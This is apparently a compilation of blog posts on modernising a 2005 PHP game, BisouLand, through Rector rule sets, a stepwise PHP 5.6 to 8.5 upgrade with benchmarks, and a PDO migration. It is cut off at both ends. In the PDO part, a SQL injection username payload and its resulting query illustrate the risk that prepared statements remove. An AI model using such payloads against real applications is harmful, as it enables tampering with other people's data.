ON CONFLICT (ip) DO UPDATE
SET timestamp = CURRENT_TIMESTAMP
SQL);
$stmt->execute([
'ip' => $_SERVER['REMOTE_ADDR'],
]);
🤘 Behold Rector, the Metamorphosis Overlord, wielding the dark grimoire of AST manipulation to transmute ancient incantations of PHP 5.6 into the blazing runes of PHP 8.x through unholy automated rituals! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (a 2005 LAMP spaghetti code base). So far, we can run it locally (http://localhost:43000/) and have some level of automated tests.
But even with a modern PHP version, we still have an eXtreme Legacy spaghetti code base...
So let's use Rector to apply some automated refactorings.
A question I often get asked is: what's the difference between Rector and PHP CS Fixer?
PHP CS Fixer was initially created to automatically fix coding style issues, such as "indentation: 4 spaces vs 1 tab", or "opening curly brace: one the same line vs on a new line", etc.
With time it grew to do more than just fixing coding style issues, like replacing deprecated function calls to their modern counterparts.
But it is a token-based parsing tool (using PHP's token_get_all()),
meaning it sees the code as a series of keywords (class), whitespace,
identifiers (MyClass), punctuation ({), and so on: very much a flat array.
This limits how much it can know and understand about the code, and therefore how (and when) it can safely modify it.
For all intents and purposes, we should treat PHP CS Fixer as a coding style enforcer, even if it can do more than that.
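You can see this flat token stream for yourself with PHP's built-in tokenizer, which is what PHP CS Fixer builds upon:

```php
<?php
declare(strict_types=1);

// How a token-based tool "sees" code: a flat list, with no tree structure.
$code = '<?php class MyClass { public int $count = 0; }';

$names = [];
foreach (token_get_all($code) as $token) {
    // Each token is either an [id, text, line] array, or a bare one-char string ('{', ';', ...).
    $names[] = is_array($token) ? token_name($token[0]) : $token;
}

echo implode(' ', $names), PHP_EOL;
// Prints: T_OPEN_TAG T_CLASS T_WHITESPACE T_STRING T_WHITESPACE { ... (no nesting anywhere)
```

Compare that with an AST view, where the same code would be a single class node containing a typed property node.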
Rector was created to automatically refactor code, such as adding type declarations, simplifying complex control flow, or removing dead code.
With time it grew to do more than just refactoring code, like fixing coding style.
So there is some overlap with PHP CS Fixer,
but Rector is an Abstract Syntax Tree (AST) tool (using PHP Parser),
meaning it holds a structured model of the code: a Class object
with an identifier attribute set to MyClass,
a collection of Property objects each having visibility, type and identifier attributes, and so on.
This gives it a deep understanding of the code, and therefore of how
to modify it safely (for example, it won't add a string typehint
to a function argument if somewhere in the code a bool is passed to it,
or if it's used as an integer inside the function).
Some people know it as the "one-off automatic upgrade tool", because it can, for example, upgrade a codebase to a newer PHP version or replace the @test annotation with the #[Test] attribute. But it is more useful as a "linting" tool run on every change (for example in the CI): once all the deprecated function calls have been replaced with their modern counterparts, you don't want someone reintroducing a deprecated function call by accident.
But coding style and upgrades are secondary features of Rector; its main one is to let you define Code Quality rules that are automatically enforced as part of your CI workflow.
Out of the box, Rector provides individual Rules as well as rule Sets. Let's have a look at what they can do for us.
The Early Return set is a collection of rules that check whether your code can be simplified with earlier returns.
Let's enable it in the rector.php config file:
<?php
declare(strict_types=1);
use Rector\Caching\ValueObject\Storage\FileCacheStorage;
use Rector\Config\RectorConfig;
use Rector\Set\ValueObject\SetList;
return RectorConfig::configure()
->withCache(
cacheDirectory: '/tmp/rector',
cacheClass: FileCacheStorage::class,
)
->withPaths([
__DIR__,
__DIR__.'/../monolith',
])
->withSkip([
// —— Excluded paths ———————————————————————————————————————————————————
// [qa]
__DIR__.'/vendor',
// [monolith]
__DIR__.'/../monolith/vendor',
])
->withSets([
// —— PHP ——————————————————————————————————————————————————————————————
SetList::PHP_84,
// —— Core —————————————————————————————————————————————————————————————
SetList::EARLY_RETURN,
])
->withRules([
]);
Now let's run it using:
make rector # ./vendor/bin/rector process
In the BisouLand codebase, this applies the ReturnEarlyIfVariableRector rule:
function calculterAmour($CalAmour, $timeDiff, $LvlCoeur, $nb1, $nb2, $nb3)
{
$CalAmour = calculerGenAmour($CalAmour, $timeDiff, $LvlCoeur, $nb1, $nb2, $nb3);
// Cette fonction ajoute un frein sur le minima.
if ($CalAmour < 0) {
- $CalAmour = 0;
+ return 0;
}
return $CalAmour;
}
As well as the RemoveAlwaysElseRector rule:
// Permet de convertir un timestamp en chaine sous la forme heure:minutes:secondes.
function strTemps($s): string
{
$m = 0;
$h = 0;
if ($s < 0) {
return '0:00:00';
- } else {
- if ($s > 59) {
- $m = floor($s / 60);
- $s = $s - $m * 60;
- }
- if ($m > 59) {
- $h = floor($m / 60);
- $m = $m - $h * 60;
- }
- $ts = $s;
- $tm = $m;
- if ($s < 10) {
- $ts = '0'.$s;
- }
- if ($m < 10) {
- $tm = '0'.$m;
- }
- if ($h > 24) {
- $d = floor($h / 24);
- $h = $h - $d * 24;
- $h = $d.' jours '.$h;
- }
-
- return $h.' h '.$tm.' min '.$ts.' sec';
+ }
+
+ if ($s > 59) {
+ $m = floor($s / 60);
+ $s = $s - $m * 60;
+ }
+
+ if ($m > 59) {
+ $h = floor($m / 60);
+ $m = $m - $h * 60;
+ }
+
+ $ts = $s;
+ $tm = $m;
+ if ($s < 10) {
+ $ts = '0'.$s;
+ }
+
+ if ($m < 10) {
+ $tm = '0'.$m;
+ }
+
+ if ($h > 24) {
+ $d = floor($h / 24);
+ $h = $h - $d * 24;
+ $h = $d.' jours '.$h;
+ }
+
+ return $h.' h '.$tm.' min '.$ts.' sec';
}
The Code Quality rule set includes a whopping 78 rules. I've enabled it as follows:
// Extract from file: rector.php
// [...]
// —— Core —————————————————————————————————————————————————————————————
SetList::CODE_QUALITY,
SetList::EARLY_RETURN,
And after running it on the BisouLand codebase, out of those 78, the following 8 have been applied:
Now let's focus on UseIdenticalOverEqualWithSameTypeRector,
"Use === / !== over == / !=, if values have the same type".
There is a similar rule in PHP CS Fixer, strict_comparison, but if we enable it, it will change ALL comparisons in the codebase to strict ones, whether it's safe to do so or not.
Rector is able to detect the type of variables, so it'll only apply it if it's safe to do so,
for example in nuage.php:
$sautPossible = 0;
// Au moins saut niveau 1.
if ($nbE[2][3] > 0) {
$distance = abs(16 * ($nuageL - $nuageSource) + $i - $positionSource);
// On prend en compte les jambes, et le niveau de saut.
$distMax2 = distanceMax($nbE[0][4], $nbE[2][3]);
if ($distance <= $distMax2) {
$sautPossible = 1;
}
}
- if (1 == $sautPossible) {
+ if (1 === $sautPossible) {
$sautPossible was defined with an integer (it should really be a boolean, but whatever),
and is potentially (in an if) set to another integer value, so it's safe to strictly
compare it to an integer.
In addition to value assignments ($sautPossible = 0), Rector can infer the type
of a variable from the type hints of the functions it is passed to or returned from.
In eXtreme Legacy applications like BisouLand, we do not have such type hints, but Rector can add them for us (again, only when it knows it's safe to do so), thanks to the 63 rules in the Type Declaration set.
For example NumericReturnTypeFromStrictScalarReturnsRector:
// Fonction qui retourne 0 si joueurAutre est meme niveau, 1 s'il est intouchable parce que trop faible, 2 s'il est intouchable parce que trop fort.
- function voirNiveau($scoreJoueur, $scoreAutre)
+ function voirNiveau($scoreJoueur, $scoreAutre): int
{
if ($scoreJoueur < 50) {
return 2;
}
if ($scoreAutre < 50) {
return 1;
}
if ($scoreJoueur > 2000 && $scoreAutre > 2000) {
return 0;
}
if (abs($scoreAutre - $scoreJoueur) <= 200) {
return 0;
}
if ($scoreJoueur - $scoreAutre > 200) {
return 1;
}
return 2;
}
The advantage of keeping Rector in your CI is that as you improve the codebase, some previously applied rules become applicable again, such as UseIdenticalOverEqualWithSameTypeRector!
Previously in nuage.php, $Niveau's type was considered mixed, but thanks to the new return type hint
Rector now knows it's an integer, and therefore that a strict comparison is safe:
$Niveau = voirNiveau($scoreSource, $score);
- if (1 == $Niveau) {
+ if (1 === $Niveau) {
if ($score >= 50) {
echo '<a class="bulle" style="cursor: default;color:blue;" onclick="return false;" href=""><strong>',$donnees_info['pseudo'],'</strong><span style="color:blue;">Joueur trop faible</span>';
} else {
echo '<a class="bulle" style="cursor: default;color:teal;" onclick="return false;" href=""><strong>',$donnees_info['pseudo'],'</strong><span style="color:teal;">Joueur ayant moins de 50 points</span>';
}
- } elseif (0 == $Niveau) {
+ } elseif (0 === $Niveau) {
echo '<a class="bulle" style="cursor: default;color:red;" onclick="return false;" href=""><strong>',$donnees_info['pseudo'],'</strong><span style="color:red;">Ce joueur a ton niveau</span>';
Another powerful rule set is Dead Code and its 55 rules.
For example in RemoveAlwaysTrueIfConditionRector,
Rector is able to detect conditions that would always evaluate to true,
and therefore remove the condition check altogether.
In the following snippet, Rector detects that $resultat is always set
because every single code path assigns it a value,
making the isset($resultat) check redundant:
if (isset($_GET['Dnuage'], $_GET['Dpos']) && !empty($_GET['Dnuage']) && !empty($_GET['Dpos'])) {
$Dnuage = htmlentities((string) $_GET['Dnuage']);
$Dpos = htmlentities((string) $_GET['Dpos']);
if ($nbE[0][5] > 0) {
$stmt = $pdo->prepare('SELECT id, oeil, score, pseudo FROM membres WHERE nuage = :nuage AND position = :position');
$stmt->execute(['nuage' => $Dnuage, 'position' => $Dpos]);
if ($donnees = $stmt->fetch()) {
// [...]
if (0 == $Niveau) {
if ($amour >= $cout) {
$resultat = "Tu as dévisagé {$pseudoCible}";
// [...]
} else {
$resultat = "Tu n'as pas assez de Points d'Amour";
}
} else {
$resultat = "Tu n'as pas le même niveau que ce joueur";
}
} else {
$resultat = "Il n'y a plus de joueur a cette position";
}
} else {
$resultat = 'Il te faut des yeux niveau 1 pour dévisager un joueur';
}
?>
<h1>Dévisager</h1>
<br />
<a href="<?php echo $Dnuage; ?>.nuage.html">Retourner sur le nuage en cours</a><br />
<br />
<?php
- if (isset($resultat)) {
- echo '<span class="info">[ '.$resultat.' ]</span><br /><br />';
- }
+ echo '<span class="info">[ '.$resultat.' ]</span><br /><br />';
There are more rule sets; here are the ones that have been configured for BisouLand:
<?php
declare(strict_types=1);
use Rector\Caching\ValueObject\Storage\FileCacheStorage;
use Rector\CodingStyle\Rector\Closure\StaticClosureRector;
use Rector\CodingStyle\Rector\FuncCall\ArraySpreadInsteadOfArrayMergeRector;
use Rector\Config\RectorConfig;
use Rector\PHPUnit\Set\PHPUnitSetList;
use Rector\Set\ValueObject\SetList;
use Rector\TypeDeclarationDocblocks\Rector\Class_\AddReturnDocblockDataProviderRector;
use Rector\TypeDeclarationDocblocks\Rector\Class_\ClassMethodArrayDocblockParamFromLocalCallsRector;
use Rector\TypeDeclarationDocblocks\Rector\Class_\DocblockVarArrayFromGetterReturnRector;
use Rector\TypeDeclarationDocblocks\Rector\Class_\DocblockVarArrayFromPropertyDefaultsRector;
use Rector\TypeDeclarationDocblocks\Rector\Class_\DocblockVarFromParamDocblockInConstructorRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddParamArrayDocblockBasedOnArrayMapRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddParamArrayDocblockFromAssignsParamToParamReferenceRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddParamArrayDocblockFromDataProviderRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddParamArrayDocblockFromDimFetchAccessRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddReturnDocblockForArrayDimAssignedObjectRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddReturnDocblockForCommonObjectDenominatorRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\AddReturnDocblockForJsonArrayRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\DocblockGetterReturnArrayFromPropertyDocblockVarRector;
use Rector\TypeDeclarationDocblocks\Rector\ClassMethod\DocblockReturnArrayFromDirectArrayInstanceRector;
use Rector\Visibility\Rector\ClassConst\ChangeConstantVisibilityRector;
use Rector\Visibility\Rector\ClassMethod\ChangeMethodVisibilityRector;
return RectorConfig::configure()
->withCache(
cacheDirectory: '/tmp/rector',
cacheClass: FileCacheStorage::class,
)
->withPaths([
__DIR__,
__DIR__.'/../monolith',
])
->withSkip([
// —— Excluded paths ———————————————————————————————————————————————————
// Excluded folders
// [qa]
__DIR__.'/vendor',
// [monolith]
__DIR__.'/../monolith/vendor',
// —— Excluded rules ———————————————————————————————————————————————————
// [CODE_QUALITY]
Rector\CodeQuality\Rector\Assign\CombinedAssignRector::class,
// [CODING_STYLE]
Rector\CodingStyle\Rector\Encapsed\EncapsedStringsToSprintfRector::class,
])
->withSets([
// —— PHP ——————————————————————————————————————————————————————————————
SetList::PHP_84,
// —— Core —————————————————————————————————————————————————————————————
SetList::CODE_QUALITY,
SetList::CODING_STYLE,
SetList::DEAD_CODE,
SetList::EARLY_RETURN,
SetList::INSTANCEOF,
SetList::NAMING,
SetList::PRIVATIZATION,
SetList::STRICT_BOOLEANS,
SetList::TYPE_DECLARATION,
// —— PHPUnit ——————————————————————————————————————————————————————————
PHPUnitSetList::PHPUNIT_CODE_QUALITY,
PHPUnitSetList::PHPUNIT_120,
])
->withRules([
// —— Core —————————————————————————————————————————————————————————————
// PHPdoc array types
AddParamArrayDocblockBasedOnArrayMapRector::class,
AddParamArrayDocblockFromAssignsParamToParamReferenceRector::class,
AddParamArrayDocblockFromDataProviderRector::class,
AddParamArrayDocblockFromDimFetchAccessRector::class,
AddReturnDocblockDataProviderRector::class,
AddReturnDocblockForArrayDimAssignedObjectRector::class,
AddReturnDocblockForCommonObjectDenominatorRector::class,
AddReturnDocblockForJsonArrayRector::class,
ClassMethodArrayDocblockParamFromLocalCallsRector::class,
DocblockGetterReturnArrayFromPropertyDocblockVarRector::class,
DocblockReturnArrayFromDirectArrayInstanceRector::class,
DocblockVarArrayFromGetterReturnRector::class,
DocblockVarArrayFromPropertyDefaultsRector::class,
DocblockVarFromParamDocblockInConstructorRector::class,
// Inherit parent visibility
ChangeConstantVisibilityRector::class,
ChangeMethodVisibilityRector::class,
// More Coding Style
ArraySpreadInsteadOfArrayMergeRector::class,
StaticClosureRector::class,
]);
Not all rule sets have been added, for example we are missing:
There are also some rules from added rulesets that we have decided to exclude:
- CombinedAssignRector: changes $value = $value + 5; assignments to $value += 5;
- EncapsedStringsToSprintfRector: changes "{$value}" to sprintf('%s', $value) or ''.$value

Finally, there are some rules that are not part of any rule set, which we have added one by one.
My advice is to select only the rule sets and rules you like, by first trying them all.
You can run Rector in "check only" mode for that purpose:
./vendor/bin/rector process --dry-run
Rector is a powerful tool that goes way beyond simple one-off upgrades.
By integrating it into your CI workflow, you can enforce Code Quality rules that continuously improve your codebase as it evolves.
The key difference with PHP CS Fixer is that Rector understands your code's structure and types through AST parsing, which means it can make safe refactoring decisions that a token-based tool simply cannot.
For BisouLand, we've seen Rector automatically:
And as the codebase improves (more type hints, better structure), Rector becomes even more effective at applying additional rules automatically.
My recommendation is to start with the rule sets that make sense for your project,
run them in --dry-run mode to review the changes,
and gradually build up your configuration by cherry-picking the rules you like.
Then keep Rector running in your CI to prevent regressions and maintain the code quality improvements you've worked so hard to achieve.
Now with our almost not spaghetti code, we truly are in the future.
⁉️ What do you mean, "still using old MySQL database"?
🤘 The Migration Warlord breaks the rusted shackles of PHP 5.6, leading the great exodus through the valleys of breaking changes, into the promised land of PHP 8.5 where type hints and constructor property promotion await in glory! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can run it locally (http://localhost:43000/), and have some level of automated tests.
But it's still stuck in the past with PHP 5.6, so let's upgrade it to PHP 8.5!
With the migration from the deprecated MySQL extension to PDO, BisouLand's codebase is technically compatible with the latest PHP version.
At least that's what Claude tells me.
If that's true, then upgrading it is as simple as modifying the monolith's Dockerfile:
- # Uses PHP 5.6 with PDO MySQL driver
+ # Uses PHP 8.5 with PDO MySQL driver
- FROM php:5.6-apache
-
- # Update sources.list to use archive repositories for Debian Stretch
- RUN sed -i 's/deb.debian.org/archive.debian.org/g' /etc/apt/sources.list \
- && sed -i 's/security.debian.org/archive.debian.org/g' /etc/apt/sources.list \
- && sed -i '/stretch-updates/d' /etc/apt/sources.list
+ FROM php:8.5-apache
We can now build the new image:
cd apps/monolith
make app-init # docker down, docker build, docker up
And that's it, welcome to the future!
Your eXtreme Legacy application might not be as lucky as BisouLand, and might require more work for an upgrade.
One way to do so is to use Rector, an automated refactoring tool that uses the power of AST to make sure the changes it makes are safe (i.e. non breaking) to do. Let's install it:
cd apps/qa
make composer arg='require --dev rector/rector'
We then need to configure it by creating the rector.php file:
<?php
declare(strict_types=1);
use Rector\Caching\ValueObject\Storage\FileCacheStorage;
use Rector\Config\RectorConfig;
use Rector\Set\ValueObject\SetList;
return RectorConfig::configure()
->withCache(
// CI-compatible temporary path for the cache
cacheDirectory: '/tmp/rector',
cacheClass: FileCacheStorage::class,
)
->withPaths([
__DIR__,
__DIR__.'/../monolith',
])
->withSkip([
// —— Excluded paths ———————————————————————————————————————————————————
// [qa]
__DIR__.'/vendor',
// [monolith]
__DIR__.'/../monolith/vendor',
])
->withSets([
// —— PHP ——————————————————————————————————————————————————————————————
SetList::PHP_56,
]);
We can then run it as follows:
make rector # ./vendor/bin/rector
This initial run ensures both the Monolith and QA apps are PHP 5.6 compliant, which they are, so no changes are made.
We could be bold and brave and change Rector's config straight from SetList::PHP_56
to SetList::PHP_84, which would make all the necessary upgrades from PHP 5.6 to 8.4 in one go,
but incremental steps are safer so we'll start with PHP 7.0:
sed -i -e 's/PHP_56/PHP_70/g' ./rector.php
# 🍏 On Mac: sed -i '' -e 's/PHP_56/PHP_70/g' ./rector.php
Running it (make rector) will spot one change that needs to be done:
replace rand() with random_int():
// Si les bisous du défenseurs sont présent, donc qu'il n'attaque pas.
if (0 == $DefBloque) {
- $DefSmack = floor($DefSmack * (1 - 1 / rand(2, 10)));
- $DefBaiser = floor($DefBaiser * (1 - 1 / rand(2, 10)));
- $DefPelle = floor($DefPelle * (1 - 1 / rand(2, 10)));
+ $DefSmack = floor($DefSmack * (1 - 1 / random_int(2, 10)));
+ $DefBaiser = floor($DefBaiser * (1 - 1 / random_int(2, 10)));
+ $DefPelle = floor($DefPelle * (1 - 1 / random_int(2, 10)));
}
Technically rand() is still supported in PHP 8,
but it does not generate cryptographically secure numbers,
so random_int() is recommended instead.
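As a quick illustration (a standalone snippet, not from the codebase), random_int() stays within its inclusive bounds and throws on an invalid range instead of silently misbehaving:

```php
<?php

// random_int() returns a cryptographically secure integer in [min, max].
$divisor = random_int(2, 10);
assert($divisor >= 2 && $divisor <= 10);

// It throws when min > max (an Error in PHP 7, a ValueError in PHP 8,
// which is a subclass of Error), so invalid ranges fail loudly.
try {
    random_int(10, 2);
    echo "no error\n";
} catch (\Error $e) {
    echo "invalid range rejected\n";
}
```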
Next step is to upgrade to PHP 7.1, which detects no changes, so we're safe to upgrade to PHP 7.2, which detects no changes, so we're safe to upgrade to PHP 7.3, which detects some changes!
The function setcookie can take an array of options as a third parameter
(and yes, we store the password in the cookie. This will need to be fixed later):
if (isset($_POST['auto'])) {
$timestamp_expire = time() + 30 * 24 * 3600;
- setcookie('pseudo', $pseudo, $timestamp_expire);
- setcookie('mdp', $mdp, $timestamp_expire);
+ setcookie('pseudo', $pseudo, ['expires' => $timestamp_expire]);
+ setcookie('mdp', $mdp, ['expires' => $timestamp_expire]);
}
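While we're touching these calls, the PHP 7.3+ options array accepts more keys than expires. Here's a sketch; the hardening flags are my addition, not part of the original change:

```php
<?php

// Assumed values for illustration.
$pseudo = 'BisouTest';
$timestamp_expire = time() + 30 * 24 * 3600;

// The PHP 7.3+ options array accepts these keys:
// expires, path, domain, secure, httponly, samesite.
$options = [
    'expires'  => $timestamp_expire,
    'path'     => '/',
    'secure'   => true,   // only send the cookie over HTTPS
    'httponly' => true,   // hide it from JavaScript
    'samesite' => 'Lax',  // basic CSRF mitigation
];

// Guard: setcookie() must run before any output is sent.
if (!headers_sent()) {
    setcookie('pseudo', $pseudo, $options);
}
```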
Next step is to upgrade to PHP 7.4, which detects no changes, so we're safe to upgrade to PHP 8.0, which detects no changes, so we're safe to upgrade to PHP 8.1, which detects some changes!
This is an interesting one, as it enforces the type of variables for function
calls that expect for example a string but might receive null:
$pdo = bd_connect();
if (isset($_POST['action'])) {
$cout = 0;
- $nuageCible = htmlentities($_POST['nuage']);
- $positionCible = htmlentities($_POST['position']);
+ $nuageCible = htmlentities((string) $_POST['nuage']);
+ $positionCible = htmlentities((string) $_POST['position']);
Next step is to upgrade to PHP 8.2, which detects no changes, so we're safe to upgrade to PHP 8.3, which detects no changes, so we're safe to upgrade to PHP 8.4, which detects some changes!
This one is for the QA app: it removes the now-unnecessary parentheses around object instantiation:
- (new Dotenv())->load(__DIR__.'/../../../monolith/.env');
+ new Dotenv()->load(__DIR__.'/../../../monolith/.env');
And that's it.
With the latest version of PHP,
we can change our Coding Style in .php-cs-fixer.dist.php
to take into account the new syntax:
- // —— Disabed rules due to PHP version compatibility ———————————————————
-
- // [PER-CS2.0] Partially disabled due to PHP version constraints.
- 'trailing_comma_in_multiline' => [
- 'after_heredoc' => true,
- 'elements' => [
- // 'arguments', For PHP 7.3+
- // 'array_destructuring', For PHP 7.1+
- 'arrays',
- // 'match', For PHP 8.0+
- // 'parameters', For PHP 8.0+
- ],
- ],
+ // —— Overridden rules —————————————————————————————————————————————————
+
+ // [Symfony] Adding `['elements']['parameters']` (Symfony doesn't have it)
+ 'trailing_comma_in_multiline' => [
+ 'after_heredoc' => true,
+ 'elements' => [
+ 'arguments',
+ 'array_destructuring',
+ 'arrays',
+ 'match',
+ 'parameters',
+ ],
+ ],
But that's not all. PHP CS Fixer also has rule sets to help us migrate the style from old PHP versions to new ones, which we'll do incrementally.
First we enable the rule sets:
// —— CS Rule Sets —————————————————————————————————————————————————————
'@Symfony' => true,
'@Symfony:risky' => true,
+ '@PHP7x0Migration' => true,
+ '@PHP7x0Migration:risky' => true,
And we run it with make cs-fix. It detected some changes:
replacing mt_rand, which is also not cryptographically secure, with random_int:
// On choisi une valeur au hasard.
- $FinalPos = $FreePos[mt_rand(0, $nbLibre - 1)];
+ $FinalPos = $FreePos[random_int(0, $nbLibre - 1)];
Next step, we upgrade the rule set to PHP 7.1:
sed -i -e 's/PHP7x0/PHP7x1/g' ./.php-cs-fixer.dist.php
# 🍏 On Mac: sed -i '' -e 's/PHP7x0/PHP7x1/g' ./.php-cs-fixer.dist.php
Running it, we get void return type hints:
- function GiveNewPosition($idJoueur)
+ function GiveNewPosition($idJoueur): void
{
$pdo = bd_connect();
$sql_info = $pdo->query('SELECT nombre FROM nuage WHERE id=1');
Next step is to upgrade to PHP 7.2, which detects no changes, so we're safe to upgrade to PHP 7.3, which detects some changes!
This one is related to HEREDOC indentation.
I'm gonna be brief now: after that, upgrading all the way to PHP 8.5 produced no further changes.
With a modern version of PHP, not only do we get security patches, exciting new features (typed code, constructor property promotion, readonly final classes, etc), and access to many modern tools and libraries (Composer, Symfony components, etc), but we also get a boost in performance.
Let's back up that last claim by running some vanity benchmarks as follows:
# Start fresh
cd apps/monolith
make app-init
BENCH_USER="BisouTest_bench"
BENCH_PASS="SuperSecret123"
# Sign up
curl -X POST 'http://localhost:43000/inscription.html' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d "Ipseudo=${BENCH_USER}&Imdp=${BENCH_PASS}&Imdp2=${BENCH_PASS}&inscription=S%27inscrire"
# Log in
BENCH_COOKIE=$(curl -X POST 'http://localhost:43000/redirect.php' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d "pseudo=${BENCH_USER}&mdp=${BENCH_PASS}&connexion=Se+connecter" \
-i -s | grep -i 'set-cookie: PHPSESSID' | sed 's/.*PHPSESSID=\([^;]*\).*/\1/' | tr -d '\r')
# Test load homepage (not signed in)
ab -l -q -k -c 50 -n 10000 http://localhost:43000/ \
| grep -E "Complete requests|Failed requests|Exception|Requests per second|Time per request.*across"
# Test load Brain page (signed in)
ab -l -q -k -c 50 -n 10000 -C "PHPSESSID=$BENCH_COOKIE" http://localhost:43000/cerveau.html \
| grep -E "Complete requests|Failed requests|Exception|Requests per second|Time per request.*across"
On my MacBook M4 (with Docker), the results are as follows:

Homepage (not signed in): +8.9% improvement
- Requests per second: 545.67 to 594.49
- Time per request (ms, mean across all concurrent requests): 1.833 to 1.682

Brain page (signed in): +30.2% improvement
- Requests per second: 313.88 to 408.78
- Time per request (ms, mean across all concurrent requests): 3.186 to 2.446

Surely with such almighty gains we won't need to rewrite BisouLand in go / rust.
⁉️ What do you mean, "the code is still unrefactorable"?
🤘 The Parameter Paladin storms forth from the OWASP bastion, raising the impenetrable shield of Prepared Statements, against the shadow army of malicious injections, that seek to corrupt the sacred data temples! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can run it locally (http://localhost:8080/), and have some level of automated tests.
But it's currently riddled with deprecated calls to mysql_query(),
so let's upgrade the codebase to PDO!
Before we start, a note on security vulnerabilities.
The BisouLand SQL queries are full of input values directly concatenated in the SQL queries, like here:
// SignUp form: inscription.php
$result = mysql_query(
'INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
."VALUES ('{$pseudo}', '{$hmdp}', '1', ".time().', '.time().", '300')"
);
This would clearly be a SQL injection risk, as someone could submit the following username:
Eisenberg', '938c2cc0dcc05f2b68c4287040cfcf71', '1', 1759645024, 1759645024, '42000'); --
Which would create the user as expected, but with 42k Love Points instead of the expected 300:
INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)
VALUES ('Eisenberg', '938c2cc0dcc05f2b68c4287040cfcf71', '1', 1759645024, 1759645024, '42000');
-- ', '938c2cc0dcc05f2b68c4287040cfcf71', '1', 1759645024, 1759645024, '300')
However looking a bit closer at the code, we can see that most of the time the user input is validated and sanitised, for example in the sign-up form the username:
- addslashes() escapes ', ", \ and NULL bytes
- htmlentities() escapes HTML characters like <, >, '

Which effectively prevents SQL Injection:
// SignUp form: inscription.php
$pseudo = htmlentities(addslashes($_POST['Ipseudo']));
$mdp = htmlentities(addslashes($_POST['Imdp']));
$taille = strlen(trim($_POST['Ipseudo']));
if ($taille >= 4 && $taille <= 15) {
// ...
$result = mysql_query(
'INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
." VALUES ('{$pseudo}', '{$hmdp}', '1', ".time().', '.time().", '300')"
);
}
Regardless, using PDO with prepared statements will make sure we don't accidentally introduce SQL vulnerabilities.
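To see why, here is a self-contained sketch (my own, not from the article: it uses an in-memory SQLite database instead of the real MySQL setup, and a table reduced to two columns) showing the earlier malicious username being neutralised by a prepared statement:

```php
<?php

// SQLite in-memory stands in for the article's MySQL database.
$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$pdo->exec('CREATE TABLE membres (pseudo TEXT, amour INTEGER)');

// The malicious username from earlier, submitted as-is.
$payload = "Eisenberg', '938c2cc0dcc05f2b68c4287040cfcf71', '1', 0, 0, '42000'); --";

// With a prepared statement, the payload is bound as a plain value:
// it can never terminate the string literal and inject SQL.
$stmt = $pdo->prepare('INSERT INTO membres (pseudo, amour) VALUES (:pseudo, :amour)');
$stmt->execute(['pseudo' => $payload, 'amour' => 300]);

$row = $pdo->query('SELECT pseudo, amour FROM membres')->fetch(PDO::FETCH_ASSOC);
// The whole payload ended up inside the pseudo column; amour stayed 300.
echo $row['amour'], "\n";
```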
The first thing we're going to do is update the apps/monolith/Dockerfile,
as we'll now need the PDO extension and its MySQL companion,
instead of the MySQL solo extension:
# ...
# Install system dependencies and PHP extensions in single layer
RUN docker-php-ext-install pdo pdo_mysql \
&& a2enmod rewrite
# ...
This change will require us to update the container:
# in apps/monolith
make down
make build
make up
Then we have to take care of the mysql_pconnect,
located in apps/monolith/phpincludes/bd.php:
<?php
include __DIR__.'/../config/parameters.php';
function bd_connect()
{
mysql_pconnect(
DATABASE_HOST.':'.DATABASE_PORT,
DATABASE_USER,
DATABASE_PASSWORD
);
mysql_select_db(DATABASE_NAME);
}
This creates a persistent connection, reused across HTTP requests.
We're going to replace it with PDO (PHP Data Objects, what a weird name), the out-of-the-box Database Abstraction Layer:
<?php
include __DIR__.'/../config/parameters.php';
function bd_connect()
{
static $pdo = null;
if (null === $pdo) {
$dsn = 'mysql:host='.DATABASE_HOST.';port='.DATABASE_PORT.';dbname='.DATABASE_NAME.';charset=utf8mb4';
$options = [
// Throw exceptions on error
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
// Return query results as associative arrays (column name => value)
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
// Use prepared statements at the database layer, for better security and performance
PDO::ATTR_EMULATE_PREPARES => false,
];
$pdo = new PDO($dsn, DATABASE_USER, DATABASE_PASSWORD, $options);
}
return $pdo;
}
We then need to change the usage of the function in the codebase:
- bd_connect() to $pdo = bd_connect()

The bd_connect function has been transformed into a Singleton:
it will always return the same instance of PDO (for the duration of the HTTP request).
I'd normally frown at this but this is a temporary measure:
my intention is to later in the series introduce a Dependency Injection Container,
and instead of having those $pdo = bd_connect() statements,
we'll have $pdo = $container->get(PDO::class);.
It's then a game of finding and replacing all mysql_* functions:

- mysql_query() to $pdo->prepare() + $stmt->execute(), or $pdo->query()
- mysql_fetch_assoc() to $stmt->fetch()
- mysql_result() to $stmt->fetchColumn()
- mysql_num_rows() to $stmt->rowCount() or $stmt->fetchColumn()
- mysql_insert_id() to $pdo->lastInsertId()

For example in apps/monolith/web/phpincludes/inscription.php:
$result = mysql_query(
'INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
."VALUES ('{$pseudo}', '{$hmdp}', '1', ".time().', '.time().", '300')"
);
if (false === $result) {
echo 'Error: '.mysql_error();
}
$id = mysql_insert_id();
Becomes:
$stmt = $pdo->prepare(
'INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
.' VALUES (:pseudo, :mdp, :confirmation, :timestamp, :lastconnect, :amour)'
);
$stmt->execute([
